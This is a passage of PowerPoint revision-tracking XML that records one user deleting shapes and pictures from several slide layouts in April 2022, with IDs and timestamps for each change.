            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:52.547" v="176" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="2194750290" sldId="2147483717"/>
              <ac:picMk id="36" creationId="{CCF43862-E39A-6C41-B844-0724F35ECE8D}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:56.021" v="179" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="266327754" sldId="2147483718"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:56.021" v="179" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="266327754" sldId="2147483718"/>
              <ac:spMk id="6" creationId="{C037E905-3A2F-7A47-B6B2-2C14131A1838}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:55.636" v="178" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="266327754" sldId="2147483718"/>
              <ac:picMk id="17" creationId="{6C5B9D50-D4A1-0347-89FE-8FF2D50C6870}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:57.408" v="181" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="4152290598" sldId="2147483719"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:57.408" v="181" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="4152290598" sldId="2147483719"/>
              <ac:spMk id="5" creationId="{5A03D159-FA7E-7946-A2E3-C277F421E076}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:57.130" v="180" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="4152290598" sldId="2147483719"/>
              <ac:picMk id="15" creationId="{8AC56AF3-9F11-B440-AC79-6B1CC838BCC5}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:59.445" v="183" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="4219054704" sldId="2147483720"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:59.445" v="183" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="4219054704" sldId="2147483720"/>
              <ac:spMk id="5" creationId="{5A03D159-FA7E-7946-A2E3-C277F421E076}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:59.159" v="182" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="4219054704" sldId="2147483720"/>
              <ac:picMk id="16" creationId="{498228BD-9CC7-B141-B403-52DC9748BBCC}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:05.916" v="187" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="4166969417" sldId="2147483722"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:03.886" v="186" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="4166969417" sldId="2147483722"/>
              <ac:spMk id="11" creationId="{7B45E37C-649D-F343-ACBF-CE939366D021}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:05.916" v="187" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="4166969417" sldId="2147483722"/>
              <ac:spMk id="13" creationId="{4C8FD434-0BC0-3F44-B92B-4573B8018E20}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:02.308" v="184" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="4166969417" sldId="2147483722"/>
              <ac:spMk id="37" creationId="{B0C9A3AD-8935-A94A-B635-253D6F38E83A}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:02.941" v="185" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="4166969417" sldId="2147483722"/>
              <ac:picMk id="39" creationId="{AA73896A-D56B-D44A-BB5C-550240815CF0}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp modSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:11.702" v="196" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
            <pc:sldLayoutMk cId="1431437025" sldId="2147483723"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:10.309" v="193" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="1431437025" sldId="2147483723"/>
              <ac:spMk id="16" creationId="{A5583B77-0D77-A34E-8283-81275F3E9415}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:09.943" v="192" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="1431437025" sldId="2147483723"/>
              <ac:spMk id="17" creationId="{8CF98308-AFBC-E14C-A180-1231217F1E6E}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:08.725" v="190" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="1431437025" sldId="2147483723"/>
              <ac:spMk id="18" creationId="{D717D3CB-D2D4-6A49-BA33-1E044F035217}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:09.078" v="191" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="1431437025" sldId="2147483723"/>
              <ac:spMk id="19" creationId="{C2210306-A808-2E4A-B31D-FFC4F65B2EF7}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:11.702" v="196" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="1431437025" sldId="2147483723"/>
              <ac:spMk id="38" creationId="{B75CEDAF-9B35-B244-BDC3-8E25466DD827}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:08.302" v="189" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="1431437025" sldId="2147483723"/>
              <ac:picMk id="14" creationId="{8B03ABCE-57D0-D849-A0BF-DE80B527E251}"/>
            </ac:picMkLst>
          </pc:picChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:08.024" v="188" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="1431437025" sldId="2147483723"/>
              <ac:picMk id="15" creationId="{CD69A4FD-5642-6546-BCCD-6B3A3C1A7B99}"/>
            </ac:picMkLst>
          </pc:picChg>
          <pc:picChg chg="del mod">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:10.805" v="195" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="861817722" sldId="2147483701"/>
              <pc:sldLayoutMk cId="1431437025" sldId="2147483723"/>
              <ac:picMk id="40" creationId="{232669C8-D9F7-4C4A-83AF-067A99FF3630}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
      </pc:sldMasterChg>
      <pc:sldMasterChg chg="mod modSldLayout">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:36:53.598" v="279" actId="6014"/>
        <pc:sldMasterMkLst>
          <pc:docMk/>
          <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
        </pc:sldMasterMkLst>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:19.684" v="201" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="465516170" sldId="2147483725"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:15.301" v="198" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="465516170" sldId="2147483725"/>
              <ac:spMk id="7" creationId="{CFC0854C-57DE-9242-98F0-D8D2BC1DD757}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:14.635" v="197" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="465516170" sldId="2147483725"/>
              <ac:spMk id="8" creationId="{6DEFB773-8237-A54F-B786-B5C19211F108}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:17.382" v="199" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="465516170" sldId="2147483725"/>
              <ac:spMk id="9" creationId="{2325821A-DB9D-424B-B816-E83550502E82}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:19.684" v="201" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="465516170" sldId="2147483725"/>
              <ac:spMk id="37" creationId="{C55AACF5-EF00-CB42-823A-B94F99F731DB}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:18.089" v="200" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="465516170" sldId="2147483725"/>
              <ac:picMk id="39" creationId="{B0D6670B-2380-714D-AD0A-1382FC43D25D}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:24.468" v="204" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="3674726009" sldId="2147483726"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:22.718" v="202" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="3674726009" sldId="2147483726"/>
              <ac:spMk id="9" creationId="{B13466A1-2612-0C47-834B-0006755A77F3}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:24.468" v="204" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="3674726009" sldId="2147483726"/>
              <ac:spMk id="37" creationId="{83A900FC-E576-CE47-A6BE-5461B0852B4B}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:23.564" v="203" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="3674726009" sldId="2147483726"/>
              <ac:picMk id="40" creationId="{3FEFAA72-9F35-7743-A59E-7C7F67C30CA1}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:26.687" v="206" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="259149156" sldId="2147483727"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:26.687" v="206" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="259149156" sldId="2147483727"/>
              <ac:spMk id="15" creationId="{A44DACC2-93A9-8B49-B474-85CD89E8D68F}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:26.323" v="205" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="259149156" sldId="2147483727"/>
              <ac:picMk id="16" creationId="{E2778E7C-0D3D-4C4D-A654-01C6F5B05609}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:29.197" v="208" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="663260033" sldId="2147483728"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:29.197" v="208" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="663260033" sldId="2147483728"/>
              <ac:spMk id="12" creationId="{F80D2814-8536-D34E-9A51-F250DEB4F82C}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:28.007" v="207" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="663260033" sldId="2147483728"/>
              <ac:picMk id="7" creationId="{32873DA4-0303-2D45-9BCE-792A64D46E3B}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:31.197" v="210" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="903406975" sldId="2147483729"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:31.197" v="210" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="903406975" sldId="2147483729"/>
              <ac:spMk id="16" creationId="{234E3CA2-6739-474E-8D82-5BED10A03FAB}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:30.368" v="209" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="903406975" sldId="2147483729"/>
              <ac:picMk id="17" creationId="{2EBF929B-B5C8-584A-B16C-79F28C7ADD67}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:33.134" v="212" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="3826298651" sldId="2147483730"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:33.134" v="212" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="3826298651" sldId="2147483730"/>
              <ac:spMk id="18" creationId="{A36E811E-A77C-3A42-8845-C22E4BAD3725}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:32.297" v="211" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="3826298651" sldId="2147483730"/>
              <ac:picMk id="19" creationId="{7F793094-995D-044B-A075-55D4B62040C5}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:38.157" v="214" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="1006045259" sldId="2147483731"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:38.157" v="214" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="1006045259" sldId="2147483731"/>
              <ac:spMk id="19" creationId="{9608F26D-E002-8C4D-BBFB-805BDE88AA9C}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:37.304" v="213" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="1006045259" sldId="2147483731"/>
              <ac:picMk id="20" creationId="{F45856B1-6130-6042-B205-F74570E1AFD6}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:40.302" v="216" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
            <pc:sldLayoutMk cId="3483681481" sldId="2147483732"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:40.302" v="216" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="3483681481" sldId="2147483732"/>
              <ac:spMk id="26" creationId="{3051A866-DE6C-844B-BBB6-8FAE73A09746}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:35:39.399" v="215" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="2236228511" sldId="2147483724"/>
              <pc:sldLayoutMk cId="3483681481" sldId="2147483732"/>
              <ac:picMk id="27" creationId="{767807FE-2972-4D44-858F-8F347054C6C2}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
